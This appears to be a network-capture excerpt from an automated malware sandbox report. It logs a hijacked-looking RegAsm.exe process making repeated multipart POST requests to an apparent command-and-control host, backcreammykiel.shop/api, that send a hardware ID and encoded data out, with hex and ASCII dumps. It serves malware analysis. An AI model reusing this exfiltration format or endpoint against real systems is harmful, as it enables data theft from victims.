                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R0EInoCYdw0TVaZNHfufF7ts5ZgzynJ%2FbX7lnSr5KN4QjXg3MaBrbFKRWxT8CLQOMlo4aLysfEpVMb1VG5N%2FB8YlFn5zuuwWLiAF%2FqQeIUdBBzFiUoq%2BNhanG%2Ff%2BX4x4hIqnkfk9dg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8981e10e9a4619d3-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-06-23 04:54:16 UTC555INData Raw: 34 64 65 0d 0a 53 6a 51 74 5a 62 44 37 62 46 7a 48 34 36 69 45 67 6c 63 37 58 47 50 36 53 73 75 7a 42 35 4c 31 39 42 65 31 70 4a 42 4c 73 37 49 78 50 69 52 48 78 74 6c 57 66 50 50 50 6f 6f 32 67 4a 46 35 2b 57 64 6f 2b 75 63 5a 69 76 76 2f 39 4e 64 54 41 73 6e 47 54 31 43 74 59 58 67 43 63 38 57 56 2b 6f 70 75 4b 76 71 49 4d 4d 56 56 71 67 57 72 70 31 6d 6d 77 7a 39 51 31 30 4d 37 79 4b 74 2f 51 4b 31 39 43 46 64 79 59 42 44 43 67 69 38 33 6e 35 6a 5a 58 4d 51 61 66 4c 36 72 5a 61 66 75 59 6e 48 71 58 69 4c 42 70 31 73 68 6f 44 67 31 48 2f 5a 34 59 50 59 71 43 32 2b 2b 67 64 30 5a 77 61 66 4e 44 73 4a 4d 6c 39 35 76 57 4c 5a 57 47 38 53 37 52 33 69 78 51 52 67 33 59 6b 77 67 2f 6f 34 6e 59 37 65 51 2f 55 7a 34 48 6b 79 57 68 77 32 76 30 6e 35 70 30 32 73
                        Data Ascii: 4deSjQtZbD7bFzH46iEglc7XGP6SsuzB5L19Be1pJBLs7IxPiRHxtlWfPPPoo2gJF5+Wdo+ucZivv/9NdTAsnGT1CtYXgCc8WV+opuKvqIMMVVqgWrp1mmwz9Q10M7yKt/QK19CFdyYBDCgi83n5jZXMQafL6rZafuYnHqXiLBp1shoDg1H/Z4YPYqC2++gd0ZwafNDsJMl95vWLZWG8S7R3ixQRg3Ykwg/o4nY7eQ/Uz4HkyWhw2v0n5p02s
                        2024-06-23 04:54:16 UTC698INData Raw: 49 75 33 5a 42 77 46 41 38 44 30 35 30 50 4f 71 75 50 7a 75 72 6d 4f 31 51 78 42 35 49 6f 72 74 74 74 2b 4a 61 62 66 74 6a 47 39 79 54 56 31 69 52 58 53 6b 65 63 32 30 34 35 76 63 47 53 70 4b 41 62 58 6a 30 54 32 68 32 71 33 32 76 33 67 64 59 33 79 49 69 61 51 72 72 4a 61 68 5a 49 43 35 4c 42 54 48 36 72 68 4d 58 30 34 53 64 63 4d 42 4f 55 4c 61 2f 63 5a 76 36 58 6b 33 4c 61 79 50 51 75 30 74 67 73 56 30 45 4c 32 4a 6f 4b 50 65 58 50 69 4b 62 6e 4c 52 6c 6d 51 39 67 5a 71 74 56 69 34 70 53 59 4e 5a 58 5a 76 45 47 36 75 7a 45 55 44 77 44 65 32 56 5a 38 35 59 76 4d 36 2b 6b 2b 58 6a 59 4e 69 69 4f 6d 30 6d 7a 33 6b 5a 78 32 33 38 7a 30 4a 39 44 58 4c 56 46 64 43 64 6d 55 44 54 53 6a 77 59 53 6b 6f 44 4a 42 66 6c 6e 61 61 49 66 53 64 4f 61 6c 6c 57 54 47 68
                        Data Ascii: Iu3ZBwFA8D050POquPzurmO1QxB5Iorttt+JabftjG9yTV1iRXSkec2045vcGSpKAbXj0T2h2q32v3gdY3yIiaQrrJahZIC5LBTH6rhMX04SdcMBOULa/cZv6Xk3LayPQu0tgsV0EL2JoKPeXPiKbnLRlmQ9gZqtVi4pSYNZXZvEG6uzEUDwDe2VZ85YvM6+k+XjYNiiOm0mz3kZx238z0J9DXLVFdCdmUDTSjwYSkoDJBflnaaIfSdOallWTGh
                        2024-06-23 04:54:16 UTC1369INData Raw: 34 63 30 32 0d 0a 35 77 35 38 48 4e 2f 71 42 74 47 33 34 6c 6c 6a 2b 39 32 69 66 46 6c 4a 68 37 30 4e 43 79 61 38 36 65 51 44 30 6b 48 70 44 5a 43 54 4c 6c 32 59 69 6d 37 6a 68 53 4d 67 61 52 4b 61 72 52 62 2f 36 59 6e 48 33 66 78 76 38 6f 32 74 67 75 57 30 51 49 33 5a 34 47 50 61 6d 45 78 2b 57 67 65 78 74 2b 42 6f 42 6f 38 5a 4d 6c 31 5a 6d 56 5a 4d 61 45 78 79 72 66 33 69 39 41 44 30 58 4e 31 32 5a 56 7a 70 69 49 70 75 63 35 47 57 5a 44 32 43 4b 75 31 6d 48 39 6e 5a 56 78 30 38 76 39 49 4e 6a 5a 4f 6c 78 44 43 63 43 55 42 44 75 72 6a 63 2f 70 34 44 52 59 4d 41 75 54 61 4f 65 54 4a 66 65 50 31 69 32 56 68 74 30 6b 77 63 49 69 58 56 35 46 35 35 6f 41 4d 4b 4b 58 69 71 54 2f 65 7a 46 56 61 6f 46 71 36 64 5a 70 73 4d 2f 55 4e 64 7a 41 2f 69 58 52 31 6a 70
                        Data Ascii: 4c025w58HN/qBtG34llj+92ifFlJh70NCya86eQD0kHpDZCTLl2Yim7jhSMgaRKarRb/6YnH3fxv8o2tguW0QI3Z4GPamEx+Wgext+BoBo8ZMl1ZmVZMaExyrf3i9AD0XN12ZVzpiIpuc5GWZD2CKu1mH9nZVx08v9INjZOlxDCcCUBDurjc/p4DRYMAuTaOeTJfeP1i2Vht0kwcIiXV5F55oAMKKXiqT/ezFVaoFq6dZpsM/UNdzA/iXR1jp
                        2024-06-23 04:54:16 UTC1369INData Raw: 5a 63 45 50 36 4b 50 7a 2b 62 6e 50 56 59 79 43 70 35 6f 35 35 4d 6c 39 34 2f 57 4c 5a 57 47 33 69 4c 56 78 6a 4d 57 44 52 69 63 38 57 56 56 76 4d 4f 4b 34 65 78 31 41 58 78 42 6d 79 79 70 30 47 58 34 68 5a 5a 6e 30 38 58 30 4a 39 6a 66 49 6c 6c 4f 43 64 69 51 43 54 6d 6f 68 38 58 6c 37 7a 52 64 4d 41 44 59 5a 75 75 52 59 75 6a 58 7a 6a 65 58 36 66 45 2f 32 35 42 71 53 51 46 76 75 66 49 58 66 4f 57 47 78 71 61 34 64 78 6b 30 44 5a 77 72 70 64 68 70 2f 5a 61 53 63 74 72 43 38 69 2f 58 31 53 6c 64 52 77 76 64 6b 77 49 36 71 59 6a 4d 36 75 4d 32 58 33 35 50 32 6d 69 75 79 53 57 6f 31 64 5a 55 32 73 33 2b 4b 64 4c 42 4c 78 59 42 52 5a 4b 58 43 44 37 6c 32 59 6a 77 38 43 4a 65 66 42 37 57 51 4d 4b 36 66 4c 4c 58 6b 58 6d 58 6e 72 42 70 32 38 49 74 57 45 73 4e
                        Data Ascii: ZcEP6KPz+bnPVYyCp5o55Ml94/WLZWG3iLVxjMWDRic8WVVvMOK4ex1AXxBmyyp0GX4hZZn08X0J9jfIllOCdiQCTmoh8Xl7zRdMADYZuuRYujXzjeX6fE/25BqSQFvufIXfOWGxqa4dxk0DZwrpdhp/ZaSctrC8i/X1SldRwvdkwI6qYjM6uM2X35P2miuySWo1dZU2s3+KdLBLxYBRZKXCD7l2Yjw8CJefB7WQMK6fLLXkXmXnrBp28ItWEsN
                        2024-06-23 04:54:16 UTC1369INData Raw: 71 75 6a 63 2f 6a 37 7a 5a 51 4f 77 69 57 4f 71 44 66 62 66 69 59 6b 33 37 58 79 2f 67 6c 30 64 4e 6f 47 41 31 48 31 59 46 4f 5a 75 66 42 2b 4f 76 73 49 31 34 78 51 64 6f 33 35 37 6b 4f 6d 34 37 55 4e 64 44 4b 73 6e 47 54 6b 43 39 53 54 77 4c 63 6e 41 4d 36 71 49 72 59 39 4f 41 77 57 44 59 47 69 69 53 6a 32 6d 58 2b 6c 4a 31 31 31 73 72 7a 4a 39 54 5a 61 42 67 4e 52 39 57 42 54 6d 62 6e 77 65 58 6c 38 43 4e 53 50 51 33 59 61 72 61 66 44 5a 76 38 6a 7a 65 58 77 66 35 70 69 5a 4a 6f 57 6b 4d 43 30 35 34 50 4e 36 57 43 32 4f 48 67 4d 56 49 78 44 5a 59 6b 6f 74 70 75 38 35 32 66 64 74 76 41 38 79 66 52 33 69 67 57 41 55 57 53 6e 68 5a 2b 2f 63 4f 4b 78 75 73 6a 54 44 30 52 6e 69 2b 6c 6b 53 66 76 32 66 34 65 76 4e 2b 77 61 64 62 63 61 41 34 4e 52 39 79 4c 43
                        Data Ascii: qujc/j7zZQOwiWOqDfbfiYk37Xy/gl0dNoGA1H1YFOZufB+OvsI14xQdo357kOm47UNdDKsnGTkC9STwLcnAM6qIrY9OAwWDYGiiSj2mX+lJ111srzJ9TZaBgNR9WBTmbnweXl8CNSPQ3YarafDZv8jzeXwf5piZJoWkMC054PN6WC2OHgMVIxDZYkotpu852fdtvA8yfR3igWAUWSnhZ+/cOKxusjTD0Rni+lkSfv2f4evN+wadbcaA4NR9yLC
                        2024-06-23 04:54:16 UTC1369INData Raw: 47 70 72 68 33 47 54 59 4d 6b 43 4b 74 31 6d 6a 33 6b 5a 39 6e 33 73 50 38 4b 64 58 62 4a 31 42 4c 42 4e 4b 4c 43 44 71 74 67 73 66 72 37 6a 5a 64 66 6b 2f 61 61 4b 37 4a 4a 61 6a 56 31 6b 66 61 79 4f 6b 6d 31 73 45 69 46 67 30 59 6e 50 46 6c 56 62 7a 44 69 75 48 73 64 51 46 38 51 5a 77 6d 75 39 70 6b 2b 35 79 59 63 74 6a 44 2b 43 6e 65 31 43 74 59 52 41 62 52 6b 51 4d 7a 71 34 76 44 37 2b 63 35 58 54 6c 42 31 6d 72 70 31 6e 32 77 7a 39 51 31 2f 4f 66 66 42 64 62 4b 61 42 52 51 53 62 72 79 5a 53 66 6e 77 63 33 71 6f 47 30 62 66 67 32 52 4a 4b 50 61 59 76 71 5a 6e 33 76 63 31 4f 41 71 31 64 4d 68 56 55 67 4f 33 4a 6b 4a 4f 36 75 47 79 2b 33 6b 50 31 6f 34 51 64 5a 71 36 64 5a 39 73 4d 2f 55 4e 66 76 46 38 69 54 4c 6b 47 70 4a 41 57 2b 35 38 68 64 38 35 59
                        Data Ascii: Gprh3GTYMkCKt1mj3kZ9n3sP8KdXbJ1BLBNKLCDqtgsfr7jZdfk/aaK7JJajV1kfayOkm1sEiFg0YnPFlVbzDiuHsdQF8QZwmu9pk+5yYctjD+Cne1CtYRAbRkQMzq4vD7+c5XTlB1mrp1n2wz9Q1/OffBdbKaBRQSbryZSfnwc3qoG0bfg2RJKPaYvqZn3vc1OAq1dMhVUgO3JkJO6uGy+3kP1o4QdZq6dZ9sM/UNfvF8iTLkGpJAW+58hd85Y
                        2024-06-23 04:54:16 UTC1369INData Raw: 4d 78 6c 77 51 39 67 76 73 5a 45 39 73 74 65 32 62 74 72 4b 39 57 6d 54 7a 32 59 2b 4a 47 7a 4c 32 30 34 35 71 63 47 53 70 4b 41 2b 56 54 6f 47 6d 43 57 71 32 57 44 30 6e 5a 4e 31 33 39 54 36 4b 64 62 43 4f 6c 5a 47 41 74 36 61 44 6a 71 6a 69 4d 7a 6c 35 48 55 58 66 45 47 66 4d 4f 6d 4a 4a 37 43 36 6d 6e 4c 2b 77 65 6c 70 6b 38 39 6d 50 69 52 73 79 39 74 4f 4f 61 6e 42 6b 71 53 67 4e 46 49 30 44 70 55 72 72 39 4a 75 39 5a 32 58 63 74 2f 4c 34 43 72 65 33 79 78 57 51 41 48 55 6d 41 45 34 6f 6f 6a 4c 37 75 64 31 46 33 78 42 6e 7a 44 70 69 53 65 77 75 5a 46 32 30 34 61 77 4e 70 2b 34 51 7a 31 57 52 5a 4b 65 41 6e 37 39 77 34 72 6d 36 6a 39 54 4d 41 47 66 4f 71 2f 59 5a 66 4f 46 6c 58 50 66 77 50 34 6c 33 4e 67 68 56 6b 6f 4d 33 35 49 44 4f 4b 57 4b 79 36 61
                        Data Ascii: MxlwQ9gvsZE9ste2btrK9WmTz2Y+JGzL2045qcGSpKA+VToGmCWq2WD0nZN139T6KdbCOlZGAt6aDjqjiMzl5HUXfEGfMOmJJ7C6mnL+welpk89mPiRsy9tOOanBkqSgNFI0DpUrr9Ju9Z2Xct/L4Cre3yxWQAHUmAE4oojL7ud1F3xBnzDpiSewuZF204awNp+4Qz1WRZKeAn79w4rm6j9TMAGfOq/YZfOFlXPfwP4l3NghVkoM35IDOKWKy6a
                        2024-06-23 04:54:16 UTC1369INData Raw: 56 62 49 65 73 47 36 44 75 2f 5a 2f 68 36 38 33 35 70 43 75 72 74 6f 51 41 39 66 6b 4d 74 41 56 73 37 71 6f 61 62 79 64 51 46 38 51 64 38 72 75 38 4e 6a 38 34 47 56 4d 75 6e 34 31 54 50 63 31 6a 39 48 63 54 6e 56 67 77 4d 34 73 70 43 47 38 2b 4d 37 56 7a 6b 58 32 47 62 42 75 67 36 62 31 35 6b 31 6a 34 54 4c 61 5a 6d 51 46 78 67 6e 62 4c 6e 79 54 69 62 6c 32 59 69 6d 31 54 5a 58 4d 41 61 4f 4f 65 54 32 66 2f 32 52 67 57 53 58 69 4a 70 43 75 72 74 6f 55 41 39 66 6b 4d 6c 41 56 73 37 71 6f 61 62 6b 4a 42 6c 6d 51 38 68 36 38 6f 51 32 70 38 66 45 48 62 79 74 37 57 65 35 75 30 4e 50 4a 32 79 35 38 6b 34 6f 35 64 6d 49 74 4b 35 64 4d 6c 56 71 32 44 72 70 69 53 65 77 30 4a 56 6e 78 63 44 78 50 39 4b 58 46 6d 68 68 41 4e 53 63 43 53 37 6e 72 38 48 79 35 33 55 58
                        Data Ascii: VbIesG6Du/Z/h6835pCurtoQA9fkMtAVs7qoabydQF8Qd8ru8Nj84GVMun41TPc1j9HcTnVgwM4spCG8+M7VzkX2GbBug6b15k1j4TLaZmQFxgnbLnyTibl2Yim1TZXMAaOOeT2f/2RgWSXiJpCurtoUA9fkMlAVs7qoabkJBlmQ8h68oQ2p8fEHbyt7We5u0NPJ2y58k4o5dmItK5dMlVq2DrpiSew0JVnxcDxP9KXFmhhANScCS7nr8Hy53UX
                        2024-06-23 04:54:16 UTC1369INData Raw: 50 43 75 69 58 30 68 74 59 74 6c 5a 61 67 63 6f 53 44 66 77 59 64 62 37 6e 79 45 58 44 4e 36 71 48 2f 69 46 34 79 56 55 47 4f 61 50 47 54 4e 37 37 2f 2f 52 36 38 68 75 42 70 69 5a 4a 6f 45 55 77 56 77 4a 38 4e 4b 4b 62 47 39 4e 6a 68 4f 46 5a 79 44 35 4d 6f 72 73 46 7a 36 39 75 65 64 73 33 63 7a 42 66 36 33 43 35 52 56 51 44 55 76 79 35 2b 36 2b 6d 68 6a 59 74 31 56 6e 35 5a 32 68 48 70 6d 53 58 50 32 66 34 65 76 4b 32 79 4d 5a 47 49 61 68 5a 36 42 4e 79 58 43 53 69 30 7a 4f 4c 46 32 67 38 62 45 67 61 4e 61 70 33 57 64 65 47 63 6d 33 6d 58 69 4a 70 43 75 72 74 6f 55 41 39 66 6b 4d 6c 41 56 73 37 71 6f 61 62 6b 4a 42 6c 6d 51 38 68 36 38 6f 51 32 70 38 66 45 48 62 79 74 37 57 65 35 75 30 4e 50 4a 32 79 35 38 6b 34 6f 35 64 6d 49 74 4b 35 64 4d 6c 56 71 32
                        Data Ascii: PCuiX0htYtlZagcoSDfwYdb7nyEXDN6qH/iF4yVUGOaPGTN77//R68huBpiZJoEUwVwJ8NKKbG9NjhOFZyD5MorsFz69ueds3czBf63C5RVQDUvy5+6+mhjYt1Vn5Z2hHpmSXP2f4evK2yMZGIahZ6BNyXCSi0zOLF2g8bEgaNap3WdeGcm3mXiJpCurtoUA9fkMlAVs7qoabkJBlmQ8h68oQ2p8fEHbyt7We5u0NPJ2y58k4o5dmItK5dMlVq2


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.449734104.21.90.184436960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        TimestampBytes transferredDirectionData
                        2024-06-23 04:54:17 UTC286OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 18166
                        Host: backcreammykiel.shop
                        2024-06-23 04:54:17 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 36 32 31 44 42 36 36 39 30 33 31 43 32 31 32 36 42 41 37 36 46 38 38 41 33 35 44 41 45 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 51 75 64 65
                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"54621DB669031C2126BA76F88A35DAEB--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@Qude
                        2024-06-23 04:54:17 UTC2835OUTData Raw: 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52
                        Data Ascii: ~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R
                        2024-06-23 04:54:17 UTC806INHTTP/1.1 200 OK
                        Date: Sun, 23 Jun 2024 04:54:17 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=q54u04gi2lpcsissi771gcf0u3; expires=Wed, 16-Oct-2024 22:40:56 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tM8SDXHiLoq33Yo5yQTdL4knXc7muNtcAO8zt6U7RnWUrvX7Qd0FfAxZvlZ4JfgK6N5Pc%2FIY53SBMkvbR63XU0KDmOR5dF7a9FiNyO%2FbyyvA1jRegUhheTOhfXouHaiRR1ElIyc0vg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8981e1151d7c9e17-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-06-23 04:54:17 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                        Data Ascii: eok 8.46.123.33
                        2024-06-23 04:54:17 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.449737104.21.90.184436960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        TimestampBytes transferredDirectionData
                        2024-06-23 04:54:18 UTC285OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8787
                        Host: backcreammykiel.shop
                        2024-06-23 04:54:18 UTC8787OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 36 32 31 44 42 36 36 39 30 33 31 43 32 31 32 36 42 41 37 36 46 38 38 41 33 35 44 41 45 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 51 75 64 65
                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"54621DB669031C2126BA76F88A35DAEB--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@Qude
                        2024-06-23 04:54:18 UTC812INHTTP/1.1 200 OK
                        Date: Sun, 23 Jun 2024 04:54:18 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=go9gp3qbappt45vdpl68l2j0bj; expires=Wed, 16-Oct-2024 22:40:57 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zqfTcw%2B5gbYcVHOvAR0JRAFyP6cPGD5ZGAnYOJXxX39O4pgMk2WRzmphmQvbvgQl%2BrTq%2BK3%2FdUdXDuYZKfGBSaPcvIegfY2Lvazp9%2FlCBbw9BqSj5WT5sGDmie8O1OUQMK2c0heGNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8981e11b6d3dc3fd-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-06-23 04:54:18 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                        Data Ascii: eok 8.46.123.33
                        2024-06-23 04:54:18 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.449739104.21.90.184436960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        TimestampBytes transferredDirectionData
                        2024-06-23 04:54:19 UTC286OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 20440
                        Host: backcreammykiel.shop
                        2024-06-23 04:54:19 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 36 32 31 44 42 36 36 39 30 33 31 43 32 31 32 36 42 41 37 36 46 38 38 41 33 35 44 41 45 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 51 75 64 65
                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"54621DB669031C2126BA76F88A35DAEB--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@Qude
                        2024-06-23 04:54:19 UTC5109OUTData Raw: 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3
                        Data Ascii: `M?lrQMn 64F6(X&7~`a
                        2024-06-23 04:54:19 UTC818INHTTP/1.1 200 OK
                        Date: Sun, 23 Jun 2024 04:54:19 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=b16np13le35tk0fm4ijton5oon; expires=Wed, 16-Oct-2024 22:40:58 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vHzJtcmHtxnNky5UQQFBc8ClE63ACnGXXBB1ppFANkjV0W%2B7PE2FfzoWrwrU%2BCKgWJ52WX2Wrk0SzJ5iSEa1wcYjR7CdWXbeEc%2Bx%2BB%2BsRWNrouQkGXVvDs%2F%2FegZJdYqnOxf6Y%2Bvd5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8981e12169954387-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-06-23 04:54:19 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                        Data Ascii: eok 8.46.123.33
                        2024-06-23 04:54:19 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.449742104.21.90.184436960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        TimestampBytes transferredDirectionData
                        2024-06-23 04:54:20 UTC285OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 5447
